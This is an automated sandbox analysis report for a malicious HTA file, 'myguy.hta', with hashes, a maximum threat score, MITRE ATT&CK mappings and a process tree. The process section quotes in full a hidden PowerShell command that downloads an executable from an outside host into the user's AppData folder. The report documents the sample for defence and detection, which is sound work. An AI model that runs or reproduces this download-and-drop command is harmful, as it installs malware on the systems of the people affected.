bab1853454ca6fdd3acd471254101db1b805b601e309a49ec7b4b1fbcfc47ad7

Resubmissions

05-08-2024 22:23

240805-2ba2rathle 10

27-04-2024 00:38

240427-ay3xhafc53 10

20-04-2024 05:28

240420-f6ht7aad5w 10

Analysis

max time kernel
119s
max time network
119s
platform
windows7_x64
resource
win7-20240221-en
resource tags

arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
submitted
27-04-2024 00:38

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

myguy.hta
Size

13KB
MD5

0487382a4daf8eb9660f1c67e30f8b25
SHA1

736752744122a0b5ee4b95ddad634dd225dc0f73
SHA256

ee29b9c01318a1e23836b949942db14d4811246fdae2f41df9f0dcd922c63bc6
SHA512

e1e7d81d54efd526139ea8ac792ed2035c8e70f040319c0b65f723431d31077c7a6927553890c99151f2354f51c4020ed94e0e2e5d56386c2fc4828e95869106
SSDEEP

192:ScIsmNvaHz65bP/U/njs3NH0Z0UvDVE6Az6XVHBycT6iLMUpJ2seCYHlfeb:SPXTmnjs3BU9A27BNLMUTb

Score

10^/10

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://french-cooking.com/myguy.exe

Signatures

Blocklisted process makes network request 1 IoCs

Processes:

powershell.exe

flow pid process

5 2060 powershell.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Modifies Internet Explorer settings 1 TTPs 1 IoCs
adware spyware

Modify Registry
T1112

Processes:

mshta.exe

description ioc process

Key created \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Main mshta.exe
Suspicious behavior: EnumeratesProcesses 1 IoCs

Processes:

powershell.exe

pid process

2060 powershell.exe
Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

powershell.exe

description pid process

Token: SeDebugPrivilege 2060 powershell.exe

flow	pid	process
5	2060	powershell.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe

pid	process
2060	powershell.exe

description	pid	process
Token: SeDebugPrivilege	2060	powershell.exe

Suspicious use of WriteProcessMemory 4 IoCs

Processes:

mshta.exe

description	pid	process	target process
PID 2276 wrote to memory of 2060	2276	mshta.exe	powershell.exe
PID 2276 wrote to memory of 2060	2276	mshta.exe	powershell.exe
PID 2276 wrote to memory of 2060	2276	mshta.exe	powershell.exe
PID 2276 wrote to memory of 2060	2276	mshta.exe	powershell.exe

C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\myguy.hta"
1⤵
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:2276

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden (New-Object System.Net.WebClient).DownloadFile('http://french-cooking.com/myguy.exe', 'C:\Users\Admin\AppData\Roaming\7694.exe');
2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2060

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Resubmissions

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads